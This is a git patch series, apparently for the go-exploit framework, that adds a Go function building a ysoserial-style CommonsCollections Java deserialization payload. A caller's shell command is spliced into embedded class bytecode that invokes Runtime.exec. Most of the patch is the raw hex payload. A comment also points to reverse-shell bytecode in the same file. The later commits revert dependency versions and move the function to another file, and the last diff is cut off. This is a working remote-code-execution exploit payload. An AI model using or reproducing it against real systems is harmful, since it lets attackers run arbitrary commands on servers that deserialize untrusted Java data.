From 5dc15082cb79e61f0dd6e37c0f4cffe8ca278131 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@shell.rip>
Date: Tue, 18 Mar 2025 12:10:21 -0600
Subject: [PATCH 1/3] Added java deserialization exploit from
 CommonsCollections10

---
 go.mod            |   2 +-
 go.sum            |   4 +-
 java/javaclass.go | 290 ++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 293 insertions(+), 3 deletions(-)

diff --git a/go.mod b/go.mod
index b629ee6..7370dd0 100644
--- a/go.mod
+++ b/go.mod
@@ -8,7 +8,7 @@ require (
 	golang.org/x/crypto v0.36.0
 	golang.org/x/net v0.37.0
 	golang.org/x/text v0.23.0
-	modernc.org/sqlite v1.36.0
+	modernc.org/sqlite v1.36.1
 )
 
 require (
diff --git a/go.sum b/go.sum
index d72e8d1..38ca444 100644
--- a/go.sum
+++ b/go.sum
@@ -50,8 +50,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
 modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
 modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
 modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
-modernc.org/sqlite v1.36.0 h1:EQXNRn4nIS+gfsKeUTymHIz1waxuv5BzU7558dHSfH8=
-modernc.org/sqlite v1.36.0/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
+modernc.org/sqlite v1.36.1 h1:bDa8BJUH4lg6EGkLbahKe/8QqoF8p9gArSc6fTqYhyQ=
+modernc.org/sqlite v1.36.1/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
 modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
 modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=
diff --git a/java/javaclass.go b/java/javaclass.go
index e40690c..0a404b5 100644
--- a/java/javaclass.go
+++ b/java/javaclass.go
@@ -1,15 +1,305 @@
 package java
 
 import (
+	"fmt"
 	"encoding/binary"
 	"strconv"
 	"strings"
+	"errors"
 
 	"github.com/vulncheck-oss/go-exploit/config"
 	"github.com/vulncheck-oss/go-exploit/random"
 	"github.com/vulncheck-oss/go-exploit/transform"
 )
 
+var (
+	errInvalidCommandLength = errors.New("invalid command length")
+)
+
+func ErrorInvalidCommandLength(msg string) error {
+	return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
+}
+
+// Created using ysoserial with CommonsCollections10
+// It was created by allocating 255 space characters for the command
+// We just use what amount of that space we need for the command and put
+// the remaining spaces back after we're finished.
+// This does however mean that the commandStr has a length limitation of 
+// the allocated space (255)
+func Commons11CommandBytecode(commandStr string) ([]byte, error) {
+	if len(commandStr) > 255 {
+		return []byte{}, ErrorInvalidCommandLength("command cannot be longer than 255 characters")
+	}
+
+	if len(commandStr) <= 0 {
+		return []byte{}, ErrorInvalidCommandLength("command must be greater than 0 characters")
+	}
+	
+	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61"+
+	"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65"+
+	"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00"+
+	"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00"+
+	"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e"+
+	"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
+	"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
+	"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e"+
+	"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79"+
+	"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c"+
+	"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76"+
+	"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
+	"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c"+
+	"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61"+
+	"\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e"+
+	"\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63"+
+	"\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74"+
+	"\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e"+
+	"\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74"+
+	"\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac"+
+	"\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64"+
+	"\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e"+
+	"\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64"+
+	"\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f"+
+	"\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06"+
+	"\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a"+
+	"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61"+
+	"\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74"+
+	"\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"+
+	"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f"+
+	"\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72"+
+	"\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61"+
+	"\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72"+
+	"\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff"+
+	"\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd"+
+	"\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00"+
+	"\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17"+
+	"\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00"+
+	"\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39"+
+	"\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07"+
+	"\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56"+
+	"\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01"+
+	"\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74"+
+	"\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd"+
+	"\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01"+
+	"\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65"+
+	"\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65"+
+	"\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63"+
+	"\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61"+
+	"\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00"+
+	"\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65"+
+	"\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49"+
+	"\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01"+
+	"\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
+	"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
+	"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53"+
+	"\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50"+
+	"\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72"+
+	"\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c"+
+	"\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f"+
+	"\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e"+
+	"\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73"+
+	"\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f"+
+	"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
+	"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
+	"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
+	"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
+	"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
+	"\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d"+
+	"\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73"+
+	"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
+	"\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65"+
+	"\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44"+
+	"\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65"+
+	"\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73"+
+	"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
+	"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
+	"\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"+
+	"\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74"+
+	"\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01"+
+	"\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73"+
+	"\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f"+
+	"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
+	"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
+	"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
+	"\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e"+
+	"\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f"+
+	"\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c"+
+	"\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73"+
+	"\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f"+
+	"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
+	"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
+	"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
+	"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
+	"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
+	"\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61"+
+	"\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73"+
+	"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
+	"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
+	"\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78"+
+	"\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01"+
+	"\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41"+
+	"\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67"+
+	"\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f"+
+	"\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72"+
+	"\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69"+
+	"\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e"+
+	"\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72"+
+	"\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64"+
+	"\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a"+
+	"\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73"+
+	"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
+	"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
+	"\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e"+
+	"\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01"+
+	"\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72"+
+	"\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c"+
+	"\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f"+
+	"\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d"+
+	"\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72"+
+	"\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76"+
+	"\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69"+
+	"\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f"+
+	"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
+	"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
+	"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
+	"\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65"+
+	"\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73"+
+	"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
+	"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
+	"\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69"+
+	"\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61"+
+	"\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00"+
+	"\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69"+
+	"\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61"+
+	"\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d"+
+	"\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e"+
+
+	// 255 characters were allocated, we just put back the unused
+	// length as spaces
+	"\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) + 
+
+	"\x08\x00\x30\x01\x00\x04"+
+	"\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76"+
+	"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e"+
+	"\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e"+
+	"\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00"+
+	"\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53"+
+	"\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65"+
+	"\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
+	"\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30"+
+	"\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c"+
+	"\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77"+
+	"\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32"+
+	"\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03"+
+	"\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06"+
+	"\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04"+
+	"\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00"+
+	"\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7"+
+	"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
+	"\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00"+
+	"\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00"+
+	"\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00"+
+	"\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1"+
+	"\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01"+
+	"\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03"+
+	"\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00"+
+	"\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01"+
+	"\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04"+
+	"\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02"+
+	"\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00"+
+	"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
+	"\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00"+
+	"\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00"+
+	"\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00"+
+	"\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00"+
+	"\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00"+
+	"\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00"+
+	"\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00"+
+	"\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12"+
+	"\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36"+
+	"\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00"+
+	"\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00"+
+	"\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00"+
+	"\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00"+
+	"\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00"+
+	"\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65"+
+	"\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55"+
+	"\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e"+
+	"\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71"+
+	"\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69"+
+	"\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00"+
+	"\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65"+
+	"\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01"+
+	"\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61"+
+	"\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74"+
+	"\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c"+
+	"\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73"+
+	"\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61"+
+	"\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75"+
+	"\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24"+
+	"\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63"+
+	"\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67"+
+	"\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00"+
+	"\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65"+
+	"\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64"+
+	"\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65"+
+	"\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76"+
+	"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
+	"\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f"+
+	"\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65"+
+	"\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
+	"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
+	"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21"+
+	"\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a"+
+	"\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02"+
+	"\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01"+
+	"\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00"+
+	"\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00"+
+	"\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00"+
+	"\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00"+
+	"\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00"+
+	"\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00"+
+	"\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50"+
+	"\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a"+
+	"\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63"+
+	"\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65"+
+	"\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c"+
+	"\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79"+
+	"\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74"+
+	"\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61"+
+	"\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e"+
+	"\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"+
+	"\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65"+
+	"\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e"+
+	"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
+	"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
+	"\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e"+
+	"\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73"+
+	"\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c"+
+	"\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67"+
+	"\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c"+
+	"\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c"+
+	"\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d"+
+	"\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61"+
+	"\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00"+
+	"\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76"+
+	"\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63"+
+	"\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00"+
+	"\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65"+
+	"\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72"+
+	"\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"+
+	"\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16"+
+	"\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00"+
+	"\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e"+
+	"\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70"+
+	"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46"+
+	"\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72"+
+	"\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64"+
+	"\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08"+
+	"\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
+
+	return []byte(payloadBytes), nil
+}
+
 // This is the Java bytecode for a reverse shell. You can find the source code here:
 //
 // https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508

From 7de4b5db70ff89667a5169a790b9a3554026a688 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@shell.rip>
Date: Tue, 18 Mar 2025 12:14:56 -0600
Subject: [PATCH 2/3] Added back old go.mod and go.sum

---
 go.mod | 2 +-
 go.sum | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/go.mod b/go.mod
index 7370dd0..b629ee6 100644
--- a/go.mod
+++ b/go.mod
@@ -8,7 +8,7 @@ require (
 	golang.org/x/crypto v0.36.0
 	golang.org/x/net v0.37.0
 	golang.org/x/text v0.23.0
-	modernc.org/sqlite v1.36.1
+	modernc.org/sqlite v1.36.0
 )
 
 require (
diff --git a/go.sum b/go.sum
index 38ca444..d72e8d1 100644
--- a/go.sum
+++ b/go.sum
@@ -50,8 +50,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
 modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
 modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
 modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
-modernc.org/sqlite v1.36.1 h1:bDa8BJUH4lg6EGkLbahKe/8QqoF8p9gArSc6fTqYhyQ=
-modernc.org/sqlite v1.36.1/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
+modernc.org/sqlite v1.36.0 h1:EQXNRn4nIS+gfsKeUTymHIz1waxuv5BzU7558dHSfH8=
+modernc.org/sqlite v1.36.0/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
 modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
 modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=

From 5dd50742f0a7e8e13fb1d52fa3d3df53cdfa6df0 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@shell.rip>
Date: Tue, 18 Mar 2025 15:29:01 -0600
Subject: [PATCH 3/3] Realized it made more sense to put it in the right file.
 Also simplified error check.

---
 java/javaclass.go  | 290 ---------------------------------------------
 java/javagadget.go | 279 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 279 insertions(+), 290 deletions(-)

diff --git a/java/javaclass.go b/java/javaclass.go
index 0a404b5..e40690c 100644
--- a/java/javaclass.go
+++ b/java/javaclass.go
@@ -1,305 +1,15 @@
 package java
 
 import (
-	"fmt"
 	"encoding/binary"
 	"strconv"
